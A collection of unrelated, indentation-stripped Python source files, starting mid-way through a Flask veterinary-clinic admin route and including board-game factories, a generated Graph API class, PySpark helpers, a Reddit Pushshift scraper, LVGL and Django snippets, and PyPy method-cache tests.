"Vet Phone": request.form.get('vet_phone'),
"Vet Specialty": request.form.get('vet_specialty')
}
# Check for any empty fields (all required in this form)
missing_fields = []
for field in vet_data.keys():
if vet_data[field] == "":
missing_fields.append(field)
if len(missing_fields) > 0:
feedback["Vets"] = f"Correct missing information: {missing_fields}"
# If no fields missing, do the insert
else:
query = 'INSERT INTO vets (first_name, last_name, email, phone, specialty) VALUES (%s, %s, %s, %s, %s)'
data = (vet_data["Vet First Name"],
vet_data["Vet Last Name"],
vet_data["Vet Email"],
vet_data["Vet Phone"],
vet_data["Vet Specialty"])
try:
result = execute_query(db_connection, query, data)
if result:
feedback["Vets"] = f"Added Vet {vet_data['Vet First Name']} {vet_data['Vet Last Name']}"
else:
feedback["Vets"] = "Add Vet Failed."
except:
feedback["Vets"] = "Add Vet Failed."
return refresh_admin(feedback), refresh_admin()
# Testing DB connection
@webapp.route('/db-test')
def test_database_connection():
print("Executing a sample query on the database using the credentials from db_credentials.py")
db_connection = connect_to_database()
query = "SELECT * from customers;"
result = execute_query(db_connection, query)
return render_template('db_test.html', rows=result)
'''
@webapp.route('/browse_bsg_people')
#the name of this function is just a cosmetic thing
def browse_people():
print("Fetching and rendering people web page")
db_connection = connect_to_database()
query = "SELECT fname, lname, homeworld, age, id from bsg_people;"
result = execute_query(db_connection, query).fetchall()
print(result)
return render_template('people_browse.html', rows=result)
@webapp.route('/add_new_people', methods=['POST','GET'])
def add_new_people():
db_connection = connect_to_database()
if request.method == 'GET':
query = 'SELECT id, name from bsg_planets'
result = execute_query(db_connection, query).fetchall()
print(result)
return render_template('people_add_new.html', planets = result)
elif request.method == 'POST':
print("Add new people!")
fname = request.form['fname']
lname = request.form['lname']
age = request.form['age']
homeworld = request.form['homeworld']
query = 'INSERT INTO bsg_people (fname, lname, age, homeworld) VALUES (%s,%s,%s,%s)'
data = (fname, lname, age, homeworld)
execute_query(db_connection, query, data)
return ('Person added!')
@webapp.route('/')
def index():
return "<p>Are you looking for /db_test or /hello or <a href='/browse_bsg_people'>/browse_bsg_people</a> or /add_new_people or /update_people/id or /delete_people/id </p>"
@webapp.route('/home')
def home():
db_connection = connect_to_database()
query = "DROP TABLE IF EXISTS diagnostic;"
execute_query(db_connection, query)
query = "CREATE TABLE diagnostic(id INT PRIMARY KEY, text VARCHAR(255) NOT NULL);"
execute_query(db_connection, query)
query = "INSERT INTO diagnostic (text) VALUES ('MySQL is working');"
execute_query(db_connection, query)
query = "SELECT * from diagnostic;"
result = execute_query(db_connection, query)
for r in result:
print(f"{r[0]}, {r[1]}")
return render_template('home.html', result = result)
@webapp.route('/db_test')
def test_database_connection():
print("Executing a sample query on the database using the credentials from db_credentials.py")
db_connection = connect_to_database()
query = "SELECT * from bsg_people;"
result = execute_query(db_connection, query)
return render_template('db_test.html', rows=result)
#display update form and process any updates, using the same function
@webapp.route('/update_people/<int:id>', methods=['POST','GET'])
def update_people(id):
print('In the function')
db_connection = connect_to_database()
#display existing data
if request.method == 'GET':
print('The GET request')
people_query = 'SELECT id, fname, lname, homeworld, age from bsg_people WHERE id = %s' % (id)
people_result = execute_query(db_connection, people_query).fetchone()
if people_result == None:
return "No such person found!"
planets_query = 'SELECT id, name from bsg_planets'
planets_results = execute_query(db_connection, planets_query).fetchall()
print('Returning')
return render_template('people_update.html', planets = planets_results, person = people_result)
elif request.method == 'POST':
print('The POST request')
character_id = request.form['character_id']
fname = request.form['fname']
lname = request.form['lname']
age = request.form['age']
homeworld = request.form['homeworld']
query = "UPDATE bsg_people SET fname = %s, lname = %s, age = %s, homeworld = %s WHERE id = %s"
data = (fname, lname, age, homeworld, character_id)
result = execute_query(db_connection, query, data)
print(str(result.rowcount) + " row(s) updated")
return redirect('/browse_bsg_people')
@webapp.route('/delete_people/<int:id>')
def delete_people(id):
# deletes a person with the given id
db_connection = connect_to_database()
query = "DELETE FROM bsg_people WHERE id = %s"
data = (id,)
result = execute_query(db_connection, query, data)
return (str(result.rowcount) + "row deleted")
'''
|
# This file is modified from the code off the book Python in Practice by
# Mark Summerfield. Copyright © 2012-13 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version. It is provided for
# educational purposes and is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import itertools
DRAUGHT, PAWN, ROOK, KNIGHT, BISHOP, KING, QUEEN = (
"DRAUGHT", "PAWN", "ROOK", "KNIGHT", "BISHOP", "KING", "QUEEN")
BLACK, WHITE = ("BLACK", "WHITE")
def console(char, background):
if char is None:
return chr(0x2B1B) if background == BLACK else chr(0x2B1C)
else:
return char
class AbstractBoard:
def __init__(self, rows=8, columns=8):
self.board = [[None for _ in range(columns)] for _ in range(rows)]
def populate_board(self):
raise NotImplementedError()
def __str__(self):
squares = []
for y, row in enumerate(self.board):
for x, piece in enumerate(row):
square = console(piece, BLACK if (y + x) % 2 else WHITE)
squares.append(square)
squares.append("\n")
return "".join(squares)
class CheckersBoard(AbstractBoard):
def __init__(self):
super().__init__(10, 10)
self.name = "checkers"
self.populate_board()
def populate_board(self):
def black():
return create_piece(DRAUGHT, BLACK)
def white():
return create_piece(DRAUGHT, WHITE)
rows = ((None, black()), (black(), None), (None, black()),
(black(), None),
(None, None), (None, None),
(None, white()), (white(), None), (None, white()),
(white(), None)) # 4 white rows
self.board = [list(itertools.islice(
itertools.cycle(squares), 0, len(rows))) for squares in rows]
class ChessBoard(AbstractBoard):
def __init__(self):
super().__init__(8, 8)
self.name = "chess"
self.populate_board()
def populate_board(self):
for row, color in ((0, BLACK), (7, WHITE)):
for columns, kind in (((0, 7), ROOK), ((1, 6), KNIGHT),
((2, 5), BISHOP), ((3,), QUEEN),
((4,), KING)):
for column in columns:
self.board[row][column] = create_piece(kind, color)
for column in range(8):
for row, color in ((1, BLACK), (6, WHITE)):
self.board[row][column] = create_piece(PAWN, color)
class ReversiBoard(AbstractBoard):
def __init__(self):
super().__init__(8, 8)
self.name = "reversi"
self.populate_board()
def populate_board(self):
start_squares = ((3, 3, WHITE), (3, 4, BLACK),
(4, 3, BLACK), (4, 4, WHITE))
for i in range(len(start_squares)):
row, column, color = start_squares[i]
self.board[row][column] = create_piece(DRAUGHT, color)
def __str__(self):
squares = []
for y, row in enumerate(self.board):
for x, piece in enumerate(row):
square = console(piece, WHITE)
squares.append(square)
squares.append("\n")
return "".join(squares)
def create_piece(kind, color):
color = "White" if color == WHITE else "Black"
name = {DRAUGHT: "Draught", PAWN: "ChessPawn", ROOK: "ChessRook",
KNIGHT: "ChessKnight", BISHOP: "ChessBishop",
KING: "ChessKing", QUEEN: "ChessQueen"}[kind]
return globals()[color + name]()
class Piece(str):
__slots__ = ()
emoji_code = {
"WhiteDraught": 0x26AA,
"WhiteChessPawn": 0x1F467,
"WhiteChessRook": 0x26EA,
"WhiteChessKnight": 0x1F417,
"WhiteChessBishop": 0x1F472,
"WhiteChessKing": 0x1F474,
"WhiteChessQueen": 0x1F478,
"BlackDraught": 0x26AB,
"BlackChessPawn": 0x1F466,
"BlackChessRook": 0x1F3E4,
"BlackChessKnight": 0x1F40E,
"BlackChessBishop": 0x1F473,
"BlackChessKing": 0x1F468,
"BlackChessQueen": 0x1F470
}
for name, code in emoji_code.items():
char = chr(code)
new = (lambda char: lambda Class: Piece.__new__(Class, char))(char)
new.__name__ = "__new__"
Class = type(name, (Piece,), dict(__slots__=(), __new__=new))
globals()[name] = Class
|
# -*- coding: utf-8 -*-
'''
# Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
#
# This file was generated and any changes will be overwritten.
'''
from __future__ import unicode_literals
from ..one_drive_object_base import OneDriveObjectBase
class SettingStateDeviceSummary(OneDriveObjectBase):
def __init__(self, prop_dict={}):
self._prop_dict = prop_dict
@property
def setting_name(self):
"""
Gets and sets the settingName
Returns:
str:
The settingName
"""
if "settingName" in self._prop_dict:
return self._prop_dict["settingName"]
else:
return None
@setting_name.setter
def setting_name(self, val):
self._prop_dict["settingName"] = val
@property
def instance_path(self):
"""
Gets and sets the instancePath
Returns:
str:
The instancePath
"""
if "instancePath" in self._prop_dict:
return self._prop_dict["instancePath"]
else:
return None
@instance_path.setter
def instance_path(self, val):
self._prop_dict["instancePath"] = val
@property
def unknown_device_count(self):
"""
Gets and sets the unknownDeviceCount
Returns:
int:
The unknownDeviceCount
"""
if "unknownDeviceCount" in self._prop_dict:
return self._prop_dict["unknownDeviceCount"]
else:
return None
@unknown_device_count.setter
def unknown_device_count(self, val):
self._prop_dict["unknownDeviceCount"] = val
@property
def not_applicable_device_count(self):
"""
Gets and sets the notApplicableDeviceCount
Returns:
int:
The notApplicableDeviceCount
"""
if "notApplicableDeviceCount" in self._prop_dict:
return self._prop_dict["notApplicableDeviceCount"]
else:
return None
@not_applicable_device_count.setter
def not_applicable_device_count(self, val):
self._prop_dict["notApplicableDeviceCount"] = val
@property
def compliant_device_count(self):
"""
Gets and sets the compliantDeviceCount
Returns:
int:
The compliantDeviceCount
"""
if "compliantDeviceCount" in self._prop_dict:
return self._prop_dict["compliantDeviceCount"]
else:
return None
@compliant_device_count.setter
def compliant_device_count(self, val):
self._prop_dict["compliantDeviceCount"] = val
@property
def remediated_device_count(self):
"""
Gets and sets the remediatedDeviceCount
Returns:
int:
The remediatedDeviceCount
"""
if "remediatedDeviceCount" in self._prop_dict:
return self._prop_dict["remediatedDeviceCount"]
else:
return None
@remediated_device_count.setter
def remediated_device_count(self, val):
self._prop_dict["remediatedDeviceCount"] = val
@property
def non_compliant_device_count(self):
"""
Gets and sets the nonCompliantDeviceCount
Returns:
int:
The nonCompliantDeviceCount
"""
if "nonCompliantDeviceCount" in self._prop_dict:
return self._prop_dict["nonCompliantDeviceCount"]
else:
return None
@non_compliant_device_count.setter
def non_compliant_device_count(self, val):
self._prop_dict["nonCompliantDeviceCount"] = val
@property
def error_device_count(self):
"""
Gets and sets the errorDeviceCount
Returns:
int:
The errorDeviceCount
"""
if "errorDeviceCount" in self._prop_dict:
return self._prop_dict["errorDeviceCount"]
else:
return None
@error_device_count.setter
def error_device_count(self, val):
self._prop_dict["errorDeviceCount"] = val
@property
def conflict_device_count(self):
"""
Gets and sets the conflictDeviceCount
Returns:
int:
The conflictDeviceCount
"""
if "conflictDeviceCount" in self._prop_dict:
return self._prop_dict["conflictDeviceCount"]
else:
return None
@conflict_device_count.setter
def conflict_device_count(self, val):
self._prop_dict["conflictDeviceCount"] = val
|
#!/usr/bin/env python
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
import test.logger_test_helper
import logging
from test.fixtures.quicksight_test_fixture import dump_env
logger = logging.getLogger(__name__)
def check_env():
dump_env()
if __name__ == "__main__":
check_env()
|
import media
toy_story = media.Movie("Toy Story",
"A story of a boy and his toys that come to life",
"https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg",
"https://www.youtube.com/watch?v=KYz2wyBy3kc")
print toy_story.storyline
avatar = media.Movie("Avatar",
"A marine on an alien planet",
"https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg",
"https://www.youtube.com/watch?v=cRdxXPV9GNQ")
print avatar.storyline
# avatar.show_trailer()
scent_of_a_woman = media.Movie("Scent of a Woman",
"Whoo-ah!",
"https://upload.wikimedia.org/wikipedia/en/9/91/Scent_of_a_Woman.jpg",
"https://www.youtube.com/watch?v=ebDO0C-RTpU")
print scent_of_a_woman.storyline
scent_of_a_woman.show_trailer()
|
# GIL全局终端锁 global interpreter Lock(cpython)
# python中的一个线程对应c语言中的一个线程
# GIL是的python同一时间只能有一个线程运行的cpu上执行字节码
# gil会根据执行的字节码行数以及时间片切换线程(时间片的时间),无法将多个线程映射到多个CPU上,gil遇到IO操作的情况下主动释放
# 对io操作来说,多线程和多进程效率差不多
# 共享变量和Queue
# pipy去GIL化的库
# Gil会根据执行的字节码行数以及时间片释放GIL,遇到IO操作的时候回释放GIL
# GIL在python2,Python3中的区别
# Python和Cpython的区别
# +=============dis查看字节码===================
# import dis
#
#
# def add(a):
# a = a + 1
# return a
#
#
# print(dis.dis(add))
# +=============dis查看字节码===================
total = 0
def add():
global total
for i in range(1000000):
total += 1
def des():
global total
for i in range(1000000):
total -= 1
import threading
thread1 = threading.Thread(target=add)
thread2 = threading.Thread(target=des)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
print(total)
|
import pyspark.sql.functions as f
import pyspark.sql.types as t
from pyspark.sql.dataframe import DataFrame
from unidecode import unidecode
import numpy as np
import os
import re
def get_spark_versions() -> 'list[str]':
spark_home = os.environ['SPARK_HOME']
spark_version = re.search('(?<=spark-).+(?=-bin)', spark_home).group(0)
hadoop_version = re.search('(?<=hadoop).+', spark_home).group(0)
return (spark_version, hadoop_version)
spark_version, hadoop_version = get_spark_versions()
if int(spark_version[0]) < 3:
def transform(self, f) -> DataFrame:
return f(self)
DataFrame.transform = transform
# UDFs
@f.udf(returnType=t.StringType())
def unidecode_udf(string):
if not string:
return None
else:
return unidecode(string)
@f.udf(returnType=t.DoubleType())
def convert_decimal_udf(string):
if string is None:
return None
else:
string = string.replace(",", ".")
return float(string.replace(".", "", string.count(".") - 1))
@f.udf(returnType=t.FloatType())
def array_product_udf(array):
if not array:
return None
else:
array = [e for e in array if e is not None]
return float(np.prod(array))
@f.udf(returnType=t.FloatType())
def array_sum_udf(array):
if not array:
return None
else:
array = [e for e in array if e is not None]
return sum(array)
# Custom methods
def df_from_struct(cols, extract_col, explode) -> DataFrame:
def _(df):
if explode:
df = df.withColumn(extract_col, f.explode(extract_col))
struct_cols = df.select(f'{extract_col}.*').columns
renamed_cols = []
for c in struct_cols:
col_ref = f.col(f'{extract_col}.' + c)
if c in cols:
renamed_cols.append(col_ref.alias(c + '_struct'))
else:
renamed_cols.append(col_ref)
return df.select(*cols, *renamed_cols)
return _
def renamer(dict) -> DataFrame:
def _(df):
for c, n in dict.items():
df = df.withColumnRenamed(c, n)
return df
return _
def unpivot(*args, col_name="categorias", value_name="valor") -> DataFrame:
if not args[0]:
key_cols = []
else:
key_cols = args[0] if type(args[0]) is list else args
def _(df):
unpivot_cols = [c for c in df.columns if c not in key_cols]
groups_str = [f"'{i}', `{i}`" for i in unpivot_cols]
unpivot_string = ", ".join(groups_str)
unpivot_query = "stack({}, {}) as ({}, {})".format(
len(unpivot_cols), unpivot_string, col_name, value_name
)
return df.selectExpr(*key_cols, unpivot_query)
return _
|
# 3. Elabore uma estrutura para representar um produto (código, nome, preço). Crie uma função para cadastrar 5 produtos. Crie outra função para aplicar 10% de aumento no preço do produto e apresente, por meio de outra função, todos os dados do produtos cadastrados, após o aumento. Construa uma função para cada opção do menu a seguir:
# Menu do Sistema
# Cadastrar
# Reajustar
# Visualizar
# Sair
# Qual opção deseja?
class produto:
codigo = 0
nome = ''
preco = 0.0
def menu():
print('1. Cadastrar')
print('2. Reajustar')
print('3. Visualizar')
print('4. Sair')
print()
opcao = int(input('Qual opção deseja? '))
return opcao
def cadastrar(vet):
for i in range(2): # for i in range(5)
p = produto()
p.codigo = int(input('Digite o código do produto: '))
p.nome = input('Digite o nome do produto: ')
p.preco = float(input('Digite o preço do produto: R$ '))
vet.append(p)
print()
return vet
def aumentar(vet):
if len(vet) > 0:
for i in range(len(vet)):
vet[i].preco = vet[i].preco + (vet[i].preco * (10 / 100))
print('Reajuste realizado com sucesso.\n')
else:
print('Não há produtos cadastrados.\n')
return vet
def apresentar(vet):
if len(vet) > 0:
for i in range(len(vet)):
print('Código do produto: {} \tNome do produto: {} \tPreço do produto: R$ {:.2f}'.format(vet[i].codigo,vet[i].nome,vet[i].preco))
print()
else:
print('Não há produtos cadastrados.\n')
def main():
vetor_produto = []
x = menu() #com "break"
while x > 0:
print()
if x == 1:
vetor_produto = cadastrar(vetor_produto)
elif x == 2:
vetor_produto = aumentar(vetor_produto)
elif x == 3:
apresentar(vetor_produto)
elif x == 4:
print('Saindo...')
break
else:
print('Comando Inválido. Tente Novamente.\n')
x = menu()
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Function to search reddit comments and submissions and
return all metadata available and return a dataFrame """
import pandas as pd
import requests
import json
import csv
import time
import datetime
def RedditSearch(query, before='', after='', search_type='hybrid'):
'''
query (string)
after (UTC Timestamp) *** Note that these must be integers ***
DEFAULT: 7 Days before now
before (UTC Timestamp)
DEFAULT: now
search_type (string)
'comment' -> only search comments
'submission' -> only search submissions
'hybrid' -> search both comments and submissions
'''
# Defaults
today = datetime.datetime.utcnow().timestamp()
delta_time = datetime.timedelta(days=7)
if not after or not before:
after = datetime.datetime.now() - delta_time
after = int(after.timestamp())
before = int(today)
print('UTC Before:', before)
print('UTC After:', after)
search_type = search_type.lower()
if search_type not in ['comment', 'submission', 'hybrid']:
print('Unknown search_type, defaulting to hybrid')
search_type = 'hybrid'
subCount = 0 # data counter
commCount = 0 # data counter
subStats = {} # data for storage
commStats = {} #data storage
subList = []
commList = []
# subfunctions
def getPushshiftData_Submission(query, after, before):
'''
query(String) string to search that
after (Timestamp)
before (Timestamp)
'''
url = 'https://api.pushshift.io/reddit/search/submission/?q='+str(query)+\
'&size=1000&after='+str(after)+'&before='+str(before)
# url params well documented at https://github.com/pushshift/api for both comments and submissions
r = requests.get(url)
data = json.loads(r.text)
return data['data']
def getPushshiftData_Comments(query, after, before):
'''
query(String) string to search that
after (Timestamp)
before (Timestamp)
'''
url = 'https://api.pushshift.io/reddit/search/comment/?q='+str(query)+\
')&size=1000&after='+str(after)+'&before='+str(before)
# url params well documented at https://github.com/pushshift/api for both comments and submissions
r = requests.get(url)
data = json.loads(r.text)
return data['data']
try:
# Collect Submissions
# Get initial Submissions that fit query
if search_type != 'comment':
print('Beginning Submission Query')
data = getPushshiftData_Submission(query, after, before)
# Will run until all posts have been gathered i.e. When the length of data variable = 0
# from the 'after' date up until before date
while len(data) > 0:
after_ = int(data[-1]['created_utc'])
for submission in data:
submission['created_utc'] = datetime.datetime.fromtimestamp(submission['created_utc'])
subCount+=1
subList.append(submission)
# Calls getPushshiftData() with the created date of the last submission
print('Oldest Post Date:' + str(data[-1]['created_utc']))
#update after variable to last created date of submission
#data has changed due to the new after variable provided by above code
data = getPushshiftData_Submission(query, after_, before)
print('Submission Query Finished')
# Collect Comments
if search_type != 'submission':
print('Beginning Comment Query')
data = getPushshiftData_Comments(query, after, before)
# Will run until all posts have been gathered i.e. When the length of data variable = 0
# from the 'after' date up until before date
while len(data) > 0:
after_ = int(data[-1]['created_utc'])
for comment in data:
comment['created_utc'] = datetime.datetime.fromtimestamp(comment['created_utc'])
commCount+=1
commList.append(comment)
# Calls getPushshiftData() with the created date of the last submission
print('Oldest Comment Date:' + str((data[-1]['created_utc'])))
#update after variable to last created date of submission
#data has changed due to the new after variable provided by above code
data = getPushshiftData_Comments(query, after_, before)
print('Comment Query Finished')
except:
print('Error while Processing')
# Convert to dfs (sub_id,created,sub,title,text,url,author,score,nsfw,numComms,permalink,flair
print('Building Output')
subDf = pd.DataFrame(subList)
# subDf = subDf.set_index('created_utc')
commDf = pd.DataFrame(commList)
# commDf = commDf.set_index('created_utc')
print('Number of Submissions Collected:', subCount)
print('Number of Comments Collected:', commCount)
return subDf, commDf
submissions, comments = RedditSearch('gummy bears')
submissions.to_csv('submissions.csv')
comments.to_csv('comments.csv')
|
class dictionary_iter:
def __init__(self, dict_obj):
self.dict_obj = dict_obj
self.dict_keys = list(self.dict_obj.keys())
self.start = 0
self.end = len(self.dict_obj)
def __iter__(self):
return self
def __next__(self):
if self.end == self.start:
raise StopIteration
i = self.start
current_result = (self.dict_keys[i], self.dict_obj[self.dict_keys[i]], )
self.start += 1
return current_result
result = dictionary_iter({1: "1", 2: "2"})
for x in result:
print(x)
|
#!/opt/bin/lv_micropython -i
import time
import lvgl as lv
import display_driver
from lv_colors import lv_colors
obj1 = lv.obj(lv.scr_act(),None)
obj1.set_size(100,50)
obj1.align(None,lv.ALIGN.CENTER, -60, -30)
# Copy the previous object and enable drag
obj2 = lv.obj(lv.scr_act(),obj1)
#obj2.set_size(100,50)
obj2.align(None,lv.ALIGN.CENTER, 0, 0)
obj2.set_drag(True)
# create style
style_shadow = lv.style_t()
style_shadow.init()
style_shadow.set_shadow_width(lv.STATE.DEFAULT, 10)
style_shadow.set_shadow_spread(lv.STATE.DEFAULT, 5)
style_shadow.set_shadow_color(lv.STATE.DEFAULT,lv_colors.BLUE)
# Copy the previous object (drag is already enabled)
obj3 = lv.obj(lv.scr_act(),obj2)
obj3.add_style(obj3.PART.MAIN,style_shadow)
obj3.align(None,lv.ALIGN.CENTER, 60, 30)
|
""" Production Livestock """
# Django
from django.db import models
DESTINATIONS_CHOICES = (
("Venta","Venta"),
("Consumo","Consumo"),
("Ambos","Ambos"),
("Trueque","Trueque"),
("Otros","Otros")
)
class ProductionLivestock(models.Model):
""" Modelos de producción ganadera"""
production = models.ForeignKey(
"producer.Production",
related_name="production_livestock",
on_delete=models.CASCADE)
type_activity = models.CharField(max_length=30)
surface = models.FloatField(default=0)
destination = models.CharField(max_length=30)
make_technical_assistance = models.BooleanField()
problems = models.CharField(max_length=200, blank=True, null=True)
suggestion = models.CharField(max_length=200, blank=True, null=True)
def __str__(self):
return 'Producción Ganadera: {}'.format(self.production.producer)
|
#!/usr/bin/python3
import filemanager
import grads
import sys
VERSION = "1.0"
auvidir = ""
def main(args):
greet()
run()
def run():
filemanager.createOutputDirs()
auvidir = filemanager.getAuViDir()
outdir = auvidir + "output/"
gradsdir = auvidir + "grads/"
gradsline = gradsdir + "line.gs"
gradsplot = gradsdir + "plot.gs"
loc = filemanager.getLoc()
locpara = filemanager.getLocPara()
arepara = filemanager.getArePara()
for location in loc:
name = location[0]
lat = location[1]
lon = location[2]
gmt = location[4]
for attr in locpara:
dirname = attr[1]
title = attr[0]
tend = "grads"
unit = attr[3]
params = attr[2]
print((name + " " + dirname + " " + tend))
grads.call(gradsline, outdir, name, lat, lon, gmt,
dirname, title, tend, unit, params)
for para in arepara:
for location in loc:
print((location[0] + " " + para[1]))
grads.area(gradsplot, outdir, location[0], location[1], location[2], location[
3], location[4], para[0], para[1], para[2], auvidir + "grads/" + para[4])
filemanager.convertToGifs()
filemanager.convertGifToMp4(6,1,1)
filemanager.moveOutputToWeb()
def greet():
print(("This is Python-AuVi Version: " + str(VERSION)))
if __name__ == "__main__":
main(sys.argv[1:])
|
import re
from textwrap import dedent, TextWrapper
from collections import defaultdict
def _is_valid_alias_source(spec, key):
return key != spec.varkw
def _is_valid_arg(spec, key):
return (key in spec.args or
key == spec.varargs or
key == spec.varkw or
key in spec.kwonlyargs)
arg_doc_pattern = re.compile(r'^-{,2}([^\d\W]\w*):\s{1,}(.+)')
alias_pattern = re.compile(r'^-{,2}([^\d\W]\w*):\s{1,}(-{1,2}[^\d\W]\w*)$')
def _normalize_argument_docs(spec, section):
"""Parse arg docs into entries and aliases
An arg entry has key in spec.{args, kwonlydefaults, varargs, varkw}
and value wrapped in multi-lines. For instance:
aa: the meaning of aa, wrapped in multiple lines. It
doesn't necessarily need to be indented, though.
An arg alias has key and value fulfilling more strict rules. The value
should be in the spec. For instance:
-a: --aa
The action when users specify -a in the CLI depends on the role and type
of --aa.
If kwargs exists, there can be aliases in the format of arg entry. These
aliases will be added into available switches. If there's no kwargs, this
type of alias is not allowed.
"""
waiting = section.split('\n')
docs, aliases = {}, {}
last_key = None
while waiting:
line = waiting.pop(0).rstrip()
matched = arg_doc_pattern.search(line) or alias_pattern.search(line)
if matched is None:
if last_key in docs:
line = ' ' + line.strip()
docs[last_key] = '{}\n{}'.format(
docs[last_key].rstrip(), line.lstrip())
else:
key, value = matched.groups()
if value.startswith('-'):
# for alias,
# argument_docs values don't start with '-'
key, value = key.lstrip('-'), value.lstrip('-')
if _is_valid_arg(spec, key):
raise ValueError(
"Key '{}' for aliasing has bee used.".format(key))
if _is_valid_alias_source(spec, value):
aliases[key] = value
last_key = key
else:
last_key = None
else:
if _is_valid_arg(spec, key):
docs[key] = value
last_key = key
elif spec.varkw is not None:
spec.kwonlyargs.append(key)
spec.kwonlydefaults[key] = False
spec.annotations[key] = bool
docs[key] = value
last_key = key
else:
last_key = None
return docs, aliases
candidate_headers_ending = (
'arg:',
'args:',
'argument:',
'arguments:',
'flag:',
'flags:',
'switch:',
'switches:',
)
def load_doc_hints(spec, docstring): # noqa
spec.descriptions = []
spec.argument_docs = {}
spec.aliases = {}
sections = [dedent(sec).strip()
for sec in docstring.split('\n\n')]
for section in sections:
if not section:
continue
original_section = section
header, *contents = section.split('\n', maxsplit=1)
if any(header.lower().endswith(item)
for item in candidate_headers_ending) and contents:
section = dedent(contents[0])
print(section)
argument_docs, aliases = _normalize_argument_docs(spec, section)
if not argument_docs and not aliases:
spec.descriptions.append(original_section)
else:
spec.argument_docs.update(**argument_docs)
spec.aliases.update(**aliases)
return spec
def _get_one_argument_doc(key, doc, width, tabstop):
key = ' ' + key + ' '
if len(key) > tabstop:
wrapper = TextWrapper(
initial_indent=' '*tabstop,
width=width-tabstop, subsequent_indent=' '*tabstop)
return key.rstrip() + '\n' + '\n'.join(wrapper.wrap(doc))
else:
wrapper = TextWrapper(
initial_indent=' '*(tabstop-len(key)),
width=width-tabstop, subsequent_indent=' '*tabstop)
return key + '\n'.join(wrapper.wrap(doc))
def _prefix_key(key):
return '-' + key if len(key) == 1 else '--' + key
def get_normalized_docstring(spec, width=70, tabstop=16):
sections = []
if hasattr(spec, 'descriptions'):
sections.append('\n\n'.join(text for text in spec.descriptions))
if hasattr(spec, 'argument_docs') and hasattr(spec, 'aliases'):
items = ['Arguments:']
aliases = defaultdict(list)
for alias, source in spec.aliases.items():
aliases[source].append(_prefix_key(alias))
candidates = []
candidates.extend(spec.args)
if spec.varargs:
candidates.append(spec.varargs)
candidates.extend(spec.kwonlyargs)
for key in candidates:
if key not in spec.argument_docs:
continue
doc = spec.argument_docs[key]
name = key
if name in spec.kwonlyargs:
key = _prefix_key(key)
if name in aliases:
aliases[key].sort(key=len, reverse=True)
key = '{}, {}'.format(
key, ', '.join(aliases[name]))
items.append(_get_one_argument_doc(key, doc, width, tabstop))
sections.append('\n'.join(items))
return '\n\n'.join(sections)
|
from pypy.objspace.std.test import test_typeobject
class AppTestMethodCaching(test_typeobject.AppTestTypeObject):
spaceconfig = {"objspace.std.withmethodcachecounter": True}
def setup_class(cls):
# This is for the following tests, which are a bit fragile and
# historically have been failing once in a while. With this hack,
# they are run up to 5 times in a row, saving the frame of the
# failed attempt. This means occasional collisions should work
# differently during the retry.
cls.w_retry = cls.space.appexec([], """():
def retry(run):
keepalive = []
for i in range(4):
try:
return run()
except AssertionError:
import sys
keepalive.append(sys.exc_info())
return run()
return retry
""")
def test_mix_classes(self):
@self.retry
def run():
import __pypy__
class A(object):
def f(self):
return 42
class B(object):
def f(self):
return 43
class C(object):
def f(self):
return 44
l = [A(), B(), C()] * 10
__pypy__.reset_method_cache_counter()
for i, a in enumerate(l):
assert a.f() == 42 + i % 3
cache_counter = __pypy__.method_cache_counter("f")
assert cache_counter[0] >= 15
assert cache_counter[1] >= 3 # should be (27, 3)
assert sum(cache_counter) == 30
def test_class_that_cannot_be_cached(self):
@self.retry
def run():
import __pypy__
class X:
pass
class Y(object):
pass
class A(Y, X):
def f(self):
return 42
class B(object):
def f(self):
return 43
class C(object):
def f(self):
return 44
l = [A(), B(), C()] * 10
__pypy__.reset_method_cache_counter()
for i, a in enumerate(l):
assert a.f() == 42 + i % 3
cache_counter = __pypy__.method_cache_counter("f")
assert cache_counter[0] >= 9
assert cache_counter[1] >= 2 # should be (18, 2)
assert sum(cache_counter) == 20
def test_change_methods(self):
@self.retry
def run():
import __pypy__
class A(object):
def f(self):
return 42
l = [A()] * 10
__pypy__.reset_method_cache_counter()
for i, a in enumerate(l):
assert a.f() == 42 + i
A.f = eval("lambda self: %s" % (42 + i + 1, ))
cache_counter = __pypy__.method_cache_counter("f")
#
# a bit of explanation about what's going on. (1) is the line "a.f()"
# and (2) is "A.f = ...".
#
# at line (1) we do the lookup on type(a).f
#
# at line (2) we do a setattr on A. However, descr_setattr does also a
# lookup of type(A).f i.e. type.f, to check if by chance 'f' is a data
# descriptor.
#
# At the first iteration:
# (1) is a miss because it's the first lookup of A.f. The result is cached
#
# (2) is a miss because it is the first lookup of type.f. The
# (non-existant) result is cached. The version of A changes, and 'f'
# is changed to be a cell object, so that subsequest assignments won't
# change the version of A
#
# At the second iteration:
# (1) is a miss because the version of A changed just before
# (2) is a hit, because type.f is cached. The version of A no longer changes
#
# At the third and subsequent iterations:
# (1) is a hit, because the version of A did not change
# (2) is a hit, see above
assert cache_counter == (17, 3)
def test_subclasses(self):
@self.retry
def run():
import __pypy__
class A(object):
def f(self):
return 42
class B(object):
def f(self):
return 43
class C(A):
pass
l = [A(), B(), C()] * 10
__pypy__.reset_method_cache_counter()
for i, a in enumerate(l):
assert a.f() == 42 + (i % 3 == 1)
cache_counter = __pypy__.method_cache_counter("f")
assert cache_counter[0] >= 15
assert cache_counter[1] >= 3 # should be (27, 3)
assert sum(cache_counter) == 30
def test_many_names(self):
@self.retry
def run():
import __pypy__
for j in range(20):
class A(object):
foo = 5
bar = 6
baz = 7
xyz = 8
stuff = 9
a = 10
foobar = 11
a = A()
names = [name for name in A.__dict__.keys()
if not name.startswith('_')]
names.sort()
names_repeated = names * 10
result = []
__pypy__.reset_method_cache_counter()
for name in names_repeated:
result.append(getattr(a, name))
append_counter = __pypy__.method_cache_counter("append")
